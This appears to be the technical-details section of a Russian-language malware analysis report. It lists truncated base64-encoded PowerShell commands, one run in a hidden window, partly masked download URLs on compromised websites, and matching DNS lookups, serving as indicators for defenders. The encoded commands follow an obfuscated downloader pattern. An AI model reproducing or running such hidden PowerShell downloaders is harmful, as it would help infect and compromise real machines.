Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAFUAVgBZAFoAeAB1AGoAPQAnAE0ARwBSAEkATgB4AGUAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAFUAYABSAGAAaQBUAHkAYABwAHIATwB0AE8AYwBvAEwAIgAgAD...
- http://fo#####diodesign.com/wp-content/3j_g08k2_6s/
- http://www.mi####ommindia.com/css/9wu_sjp_rvn/
- http://mi###lavell.com/cgi-bin/akmt_4ns_bau/
- http://mo##k.com/img/bg/css/ymiu_ow_uiatk/
- DNS ASK fo#####diodesign.com
- DNS ASK mi####ommindia.com
- DNS ASK mi###lavell.com
- DNS ASK mo##k.com
- DNS ASK ov####eative.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAFUAVgBZAFoAeAB1AGoAPQAnAE0ARwBSAEkATgB4AGUAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAFUAYABSAGAAaQBUAHkAYABwAHIATwB0AE8AYwBvAEwAIgAgAD...' (со скрытым окном)